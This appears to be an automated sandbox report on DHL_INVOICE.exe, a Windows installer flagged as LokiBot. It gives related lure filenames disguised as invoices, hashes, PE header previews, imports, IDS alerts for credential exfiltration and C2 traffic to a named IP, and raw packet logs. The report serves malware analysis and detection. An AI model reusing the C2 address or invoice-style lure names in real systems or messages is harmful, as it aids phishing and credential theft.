                                                                          • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                                                                          • Filename: HF-2209869481.exe, Detection: malicious, Browse
                                                                          • Filename: HF-2209869481.exe, Detection: malicious, Browse
                                                                          • Filename: RFQ852352-006420025_rev001.exe, Detection: malicious, Browse
                                                                          • Filename: RFQ852352-006420025_rev001.exe, Detection: malicious, Browse
                                                                          • Filename: receipt_001546037_pdf.exe, Detection: malicious, Browse
                                                                          • Filename: receipt_001546037_pdf.exe, Detection: malicious, Browse
                                                                          • Filename: PROFORMA INVOICE.exe, Detection: malicious, Browse
                                                                          • Filename: PROFORMA INVOICE.exe, Detection: malicious, Browse
                                                                          • Filename: BESTELLUNG Nr. 6010551.exe, Detection: malicious, Browse
                                                                          • Filename: BESTELLUNG Nr. 6010551.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.NSIS.Injector.AOW.tr.19074.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.NSIS.Injector.AOW.tr.19074.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.NSIS.InjectorX-gen.1168.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.]e..]e..]e......Ze......Ze..]e..Ie......Ye......\e......\e......\e..Rich]e..........................PE..L...^+.c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):641696
                                                                          Entropy (8bit):7.185002291549296
                                                                          Encrypted:false
                                                                          SSDEEP:12288:+fYzP7r9r/+ppppppppppppppppppppppppppppp0YcV22nNBdyn5/AT7ykJGP7t:AYz1Mc5nNm5/AT7LdL6
                                                                          MD5:C15B81D99F8367B4C4E8B4C2244F3DF6
                                                                          SHA1:CB8277DC29360515D91A0228C41DE01C22A75608
                                                                          SHA-256:09EC94C4B0172CEB189B7E15B36D82E70FEF89A19D20856B5C60211A01693D48
                                                                          SHA-512:8622F8D97F5DA3E2F7D267296231385EDB28D9CDAA47C327669A8AADF1AD46C9FAF48E933C3C901F605381901978DE007769F41A1B2A845AA5D600EF4220A180
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r...........6............@.......................................@..............................................Q..............."...........................................................................................text...2p.......r.................. ..`.rdata...............v..............@..@.data...............................@....ndata...P...`...........................rsrc....Q.......R..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:false
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1
                                                                          Process:C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):47
                                                                          Entropy (8bit):1.1262763721961973
                                                                          Encrypted:false
                                                                          SSDEEP:3:/lSllIEXln:AWE1
                                                                          MD5:D69FB7CE74DAC48982B69816C3772E4E
                                                                          SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                                                          SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                                                          SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                                                          Malicious:false
                                                                          Preview:........................................user.
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.185002291549296
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:DHL_INVOICE.exe
                                                                          File size:641'696 bytes
                                                                          MD5:c15b81d99f8367b4c4e8b4c2244f3df6
                                                                          SHA1:cb8277dc29360515d91a0228c41de01c22a75608
                                                                          SHA256:09ec94c4b0172ceb189b7e15b36d82e70fef89a19d20856b5c60211a01693d48
                                                                          SHA512:8622f8d97f5da3e2f7d267296231385edb28d9cdaa47c327669a8aadf1ad46c9faf48e933c3c901f605381901978de007769f41a1b2a845aa5d600ef4220a180
                                                                          SSDEEP:12288:+fYzP7r9r/+ppppppppppppppppppppppppppppp0YcV22nNBdyn5/AT7ykJGP7t:AYz1Mc5nNm5/AT7LdL6
                                                                          TLSH:55D4ADC5EA8455A0ED5AAB706A37CD3642237EFCA874941D29DD3E273FFB2931026053
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r.........
                                                                          Icon Hash:c5a684988c94a0c5
                                                                          Entrypoint:0x4036fc
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x63132B9B [Sat Sep 3 10:25:31 2022 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                                                          Signature Valid:false
                                                                          Signature Issuer:E=Animalivore@bykernens.Wi, OU="Nonrationalness Datareduktionsfordeler Forsvarsstabenes ", O=Bowingly, L=\xc9pernay, S=Grand Est, C=FR
                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                          Error Number:-2146762487
                                                                          Not Before, Not After
                                                                          • 12/01/2023 01:19:14 11/01/2026 01:19:14
                                                                          Subject Chain
                                                                          • E=Animalivore@bykernens.Wi, OU="Nonrationalness Datareduktionsfordeler Forsvarsstabenes ", O=Bowingly, L=\xc9pernay, S=Grand Est, C=FR
                                                                          Version:3
                                                                          Thumbprint MD5:1B5D78FA0ECCAB16C05796B9294A9ACB
                                                                          Thumbprint SHA-1:5CE65EB331B756EB79F4E5B51A18EBB7A5C07700
                                                                          Thumbprint SHA-256:4CCE80561C3324BB7A1A46B846337DD7F4C2C9BC094714C39556BF47D8928A35
                                                                          Serial:7E597B60D74BB1F6842E4D0F75D937404CB8B30A
                                                                          Instruction
                                                                          sub esp, 000003ECh
                                                                          push ebx
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          xor ebx, ebx
                                                                          mov edi, 00409528h
                                                                          push 00008001h
                                                                          mov dword ptr [esp+14h], ebx
                                                                          mov ebp, ebx
                                                                          call dword ptr [00409170h]
                                                                          mov esi, dword ptr [004090ACh]
                                                                          lea eax, dword ptr [esp+2Ch]
                                                                          xorps xmm0, xmm0
                                                                          mov dword ptr [esp+40h], ebx
                                                                          push eax
                                                                          movlpd qword ptr [esp+00000144h], xmm0
                                                                          mov dword ptr [esp+30h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007F39A8F0DE09h
                                                                          lea eax, dword ptr [esp+2Ch]
                                                                          mov dword ptr [esp+2Ch], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          push 00000053h
                                                                          pop eax
                                                                          mov dl, 04h
                                                                          mov byte ptr [esp+00000146h], dl
                                                                          cmp word ptr [esp+40h], ax
                                                                          jne 00007F39A8F0DDE3h
                                                                          mov eax, dword ptr [esp+5Ah]
                                                                          add eax, FFFFFFD0h
                                                                          mov word ptr [esp+00000140h], ax
                                                                          jmp 00007F39A8F0DDDDh
                                                                          xor eax, eax
                                                                          jmp 00007F39A8F0DDC4h
                                                                          mov dl, byte ptr [esp+00000146h]
                                                                          cmp dword ptr [esp+30h], 0Ah
                                                                          jnc 00007F39A8F0DDDDh
                                                                          movzx eax, word ptr [esp+38h]
                                                                          mov dword ptr [esp+38h], eax
                                                                          jmp 00007F39A8F0DDD6h
                                                                          mov eax, dword ptr [esp+38h]
                                                                          mov dword ptr [00435AF8h], eax
                                                                          movzx eax, byte ptr [esp+30h]
                                                                          shl ax, 0008h
                                                                          movzx ecx, ax
                                                                          movzx eax, byte ptr [esp+34h]
                                                                          or ecx, eax
                                                                          movzx eax, byte ptr [esp+00000140h]
                                                                          shl ax, 0008h
                                                                          shl ecx, 10h
                                                                          movzx eax, word ptr [eax]
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9b0c0xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b0000x351f8.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x9a7a80x22f8
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x90000x2b0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x70320x7200False0.6497395833333334data6.41220875237026IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x90000x19a20x1a00False0.455078125data5.04107190530894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xb0000x2ab000x200False0.30078125data2.035495984906757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x360000x250000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x5b0000x351f80x35200False0.21223345588235293data4.448741668415925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x5b4f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.07868508221933042
                                                                          RT_ICON0x6bd180x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.15114568005045195
                                                                          RT_ICON0x751c00x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.1543233082706767
                                                                          RT_ICON0x7b9a80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.175184842883549
                                                                          RT_ICON0x80e300x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.15948275862068967
                                                                          RT_ICON0x850580x35e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9907192575406032
                                                                          RT_ICON0x886380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.24107883817427386
                                                                          RT_ICON0x8abe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2678236397748593
                                                                          RT_ICON0x8bc880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.4584221748400853
                                                                          RT_ICON0x8cb300x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.37459016393442623
                                                                          RT_ICON0x8d4b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.47382671480144406
                                                                          RT_ICON0x8dd600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.45564516129032256
                                                                          RT_ICON0x8e4280x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                          RT_ICON0x8ea900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3504335260115607
                                                                          RT_ICON0x8eff80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.42819148936170215
                                                                          RT_ICON0x8f4600x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.43951612903225806
                                                                          RT_ICON0x8f7480x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4016393442622951
                                                                          RT_ICON0x8f9300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.4831081081081081
                                                                          RT_DIALOG0x8fa580x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x8fb580x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0x8fc780xc4dataEnglishUnited States0.5918367346938775
                                                                          RT_DIALOG0x8fd400x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0x8fda00x102dataEnglishUnited States0.6046511627906976
                                                                          RT_MANIFEST0x8fea80x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5541022592152199
                                                                          DLLImport
                                                                          ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                                          SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                                                          ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                          USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                                                          GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                                          KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          192.168.11.20216.128.145.19649723802024312 08/10/23-19:20:55.548476TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972380192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649723802021641 08/10/23-19:20:55.548476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649723802024317 08/10/23-19:20:55.548476TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24972380192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649722802024312 08/10/23-19:20:54.302237TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972280192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649724802024318 08/10/23-19:20:56.869971TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649724802021641 08/10/23-19:20:56.869971TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649722802021641 08/10/23-19:20:54.302237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649724802024313 08/10/23-19:20:56.869971TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.11.20216.128.145.196
                                                                          192.168.11.20216.128.145.19649722802024317 08/10/23-19:20:54.302237TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24972280192.168.11.20216.128.145.196
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Aug 10, 2023 19:20:51.786776066 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:51.786808968 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:51.787030935 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:51.811733007 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:51.811753988 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:51.858277082 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:51.858525991 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:51.859854937 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:51.860131979 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:51.957412958 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:51.957432985 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:51.957792997 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:51.957941055 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:51.962910891 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:52.004138947 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:52.359705925 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:52.360007048 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:52.360028982 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:52.360063076 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:52.360125065 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:52.360135078 CEST44349720142.250.185.110192.168.11.20
                                                                          Aug 10, 2023 19:20:52.360173941 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:52.360174894 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:52.360281944 CEST49720443192.168.11.20142.250.185.110
                                                                          Aug 10, 2023 19:20:52.522027969 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.522072077 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.522288084 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.522525072 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.522552967 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.563901901 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.564084053 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.564084053 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.564596891 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.564766884 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.564766884 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.564779997 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.568686962 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.568696976 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.568892956 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.569047928 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.569422960 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.612144947 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.811562061 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.811789989 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.811913967 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.811964035 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.812105894 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.812804937 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.813097000 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.814213037 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.814450026 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.814493895 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.814836979 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.815093040 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.816560984 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.816838026 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.816900015 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.817125082 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.817198038 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.817462921 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.817521095 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.817751884 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.822261095 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.822464943 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.822539091 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.822740078 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.822782993 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.822841883 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.823000908 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.823048115 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.823204041 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.823429108 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.823481083 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.823709965 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.824130058 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.824383974 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.824440002 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.824640036 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.824804068 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.825030088 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.825084925 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.825287104 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.825457096 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.825723886 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.825781107 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.826029062 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.826235056 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.826445103 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.826500893 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.826705933 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.827044964 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.827267885 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.827320099 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.827548027 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.827876091 CEST44349721142.250.185.129192.168.11.20
